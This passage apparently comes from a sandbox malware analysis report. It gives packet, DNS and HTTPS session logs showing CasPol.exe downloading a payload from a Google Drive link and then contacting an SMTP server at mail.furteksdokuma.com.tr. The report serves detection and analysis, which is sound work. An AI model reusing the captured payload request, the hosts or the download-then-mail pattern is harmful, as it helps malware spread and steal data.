Dec 1, 2021 13:26:35.624349117 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.624398947 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.624409914 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.624566078 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.624780893 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.624953032 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.625019073 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.625046968 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.625161886 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.625179052 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.625207901 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.625225067 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.625540018 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.625785112 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.625957012 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.625978947 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.625997066 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.626307964 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.626355886 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.626576900 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.626621008 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.626781940 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.626866102 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.626882076 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.626903057 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.627031088 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.627063036 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.627075911 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.627386093 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.627561092 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.627614021 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.627645969 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.627727985 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.627854109 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.627881050 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.628078938 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.628120899 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.628267050 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.628294945 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.628407955 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.628483057 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.628508091 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.628573895 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.628695965 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.628743887 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.628928900 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.629153013 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.629317045 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.629403114 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.629484892 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.629565001 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.629592896 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.629618883 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.629760981 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.629781961 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.629797935 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.629936934 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.630058050 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.630085945 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.630260944 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.630295992 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.630320072 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.630491972 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.630546093 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.630707026 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.630734921 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.630870104 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.630896091 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.631025076 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.631109953 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.631237030 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.631244898 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.631272078 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.631522894 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.631597996 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.631627083 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.631724119 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.631776094 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.631932974 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.631961107 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.632096052 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.632169008 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.632245064 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.632265091 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.632281065 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.632364988 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.632411003 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.632424116 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.632441998 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.632586956 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.632611990 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.632746935 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.632767916 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.632786989 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.632910967 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.632937908 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.633066893 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.633081913 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.633100033 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.633239031 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.633297920 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.633323908 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.633387089 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.633467913 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.633486986 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.633641958 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.633668900 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.633697033 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.633853912 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.633878946 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.633938074 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.633964062 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.634016991 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.634032965 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.634114027 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.634130001 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.634144068 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.634258986 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.634270906 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.634279966 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.634391069 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.634421110 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.634434938 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.634560108 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.634609938 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.634624958 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.634721041 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.634800911 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.634833097 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.634855986 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.634990931 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.635138035 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.635159969 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.635270119 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.635325909 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.635384083 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.635400057 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.635416985 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.635520935 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.635543108 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.635668993 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.635691881 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.635833025 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.635860920 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.635878086 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.635987043 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.636001110 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.636013985 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.636113882 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.636168957 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.636184931 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.636198044 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.636284113 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.636291981 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.636301041 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.636333942 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.636348963 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.636563063 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.636581898 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.636702061 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.636734009 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.636748075 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.636840105 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.636868954 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.636883020 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.636986017 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.637012959 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.637033939 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.637145042 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.637238979 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.637258053 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.637290955 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.637425900 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.637661934 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.637816906 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:26:35.637892962 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.637967110 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.638019085 CET	49806	443	192.168.11.20	142.250.185.129
Dec 1, 2021 13:26:35.638041973 CET	443	49806	142.250.185.129	192.168.11.20
Dec 1, 2021 13:28:11.590107918 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:11.602726936 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:11.602920055 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:11.632350922 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:11.632638931 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:11.645721912 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:11.645993948 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:11.663474083 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:11.666024923 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:11.693639040 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:11.693717003 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:11.693772078 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:11.693810940 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:11.694109917 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:11.694607019 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:11.696805954 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:11.710294962 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:11.765938997 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:11.855952024 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:11.868671894 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:11.869770050 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:11.883033991 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:11.883548021 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:11.914380074 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:11.915065050 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:11.928006887 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:11.928529978 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:11.981837988 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:11.989382982 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:11.989763975 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:12.002435923 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:12.047148943 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:12.048964024 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:12.048988104 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:12.049041033 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:12.049151897 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:28:12.061407089 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:12.061451912 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:12.061463118 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:12.061564922 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:12.065956116 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:28:12.109581947 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:29:51.275520086 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:29:51.291872025 CET	587	49815	116.202.203.61	192.168.11.20
Dec 1, 2021 13:29:51.292092085 CET	49815	587	192.168.11.20	116.202.203.61
Dec 1, 2021 13:29:51.292498112 CET	49815	587	192.168.11.20	116.202.203.61

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2021 13:26:34.615816116 CET	57972	53	192.168.11.20	1.1.1.1
Dec 1, 2021 13:26:34.625118971 CET	53	57972	1.1.1.1	192.168.11.20
Dec 1, 2021 13:26:35.281450033 CET	63711	53	192.168.11.20	1.1.1.1
Dec 1, 2021 13:26:35.291563988 CET	53	63711	1.1.1.1	192.168.11.20
Dec 1, 2021 13:28:11.242357016 CET	52941	53	192.168.11.20	1.1.1.1
Dec 1, 2021 13:28:11.528119087 CET	53	52941	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 1, 2021 13:26:34.615816116 CET	192.168.11.20	1.1.1.1	0xc13b	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)
Dec 1, 2021 13:26:35.281450033 CET	192.168.11.20	1.1.1.1	0xed60	Standard query (0)	doc-0c-6k-docs.googleusercontent.com	A (IP address)	IN (0x0001)
Dec 1, 2021 13:28:11.242357016 CET	192.168.11.20	1.1.1.1	0xbfc7	Standard query (0)	mail.furteksdokuma.com.tr	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 1, 2021 13:26:34.625118971 CET	1.1.1.1	192.168.11.20	0xc13b	No error (0)	drive.google.com		142.250.186.174	A (IP address)	IN (0x0001)
Dec 1, 2021 13:26:35.291563988 CET	1.1.1.1	192.168.11.20	0xed60	No error (0)	doc-0c-6k-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 13:26:35.291563988 CET	1.1.1.1	192.168.11.20	0xed60	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.129	A (IP address)	IN (0x0001)
Dec 1, 2021 13:28:11.528119087 CET	1.1.1.1	192.168.11.20	0xbfc7	No error (0)	mail.furteksdokuma.com.tr	furteksdokuma.com.tr		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 13:28:11.528119087 CET	1.1.1.1	192.168.11.20	0xbfc7	No error (0)	furteksdokuma.com.tr		116.202.203.61	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

drive.google.com

doc-0c-6k-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49805	142.250.186.174	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 12:26:34 UTC	0	OUT	GET /uc?export=download&id=11UpsPasq_HHo9riShtDnotSECFd2czsi HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2021-12-01 12:26:35 UTC	0	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 01 Dec 2021 12:26:35 GMT Location: https://doc-0c-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8005s8f1oltsnuahdkbclh0bd9255sdi/1638361575000/11612195336931281153/*/11UpsPasq_HHo9riShtDnotSECFd2czsi?e=download P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]} Content-Security-Policy: script-src 'nonce-fdGtKsMGMcuJ8RMWeKP+qw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq" X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: NID=511=BpRc3QlENhNxCf0iwnsNT1a5StpTR8dcx4GhGfWh3A0ILCpYkUN_0JiFL7utkZyPayoMQxwlQUoaAsXsh9V4HaJr7yzcPVSlpJJDQrB5oh5qB5A0xgJlZlb-tYHrHfc606Gi0kY0gVuynkpe03vKCxDR-GFkKTzYN0HE4Hcoczg; expires=Thu, 02-Jun-2022 12:26:34 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-12-01 12:26:35 UTC	1	IN	Data Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 63 2d 36 6b 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 38 30 30 35 Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0c-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8005
2021-12-01 12:26:35 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49806	142.250.185.129	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-01 12:26:35 UTC	2	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8005s8f1oltsnuahdkbclh0bd9255sdi/1638361575000/11612195336931281153/*/11UpsPasq_HHo9riShtDnotSECFd2czsi?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0c-6k-docs.googleusercontent.com Connection: Keep-Alive
2021-12-01 12:26:35 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdsunyHS9qVeO6K8uH34kgGRvgg25zIqYynnjnAx5S9gyQkEOpeVi560WKau_nlSEKH-7ujHx_mAuJ8asd1DtTI Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, 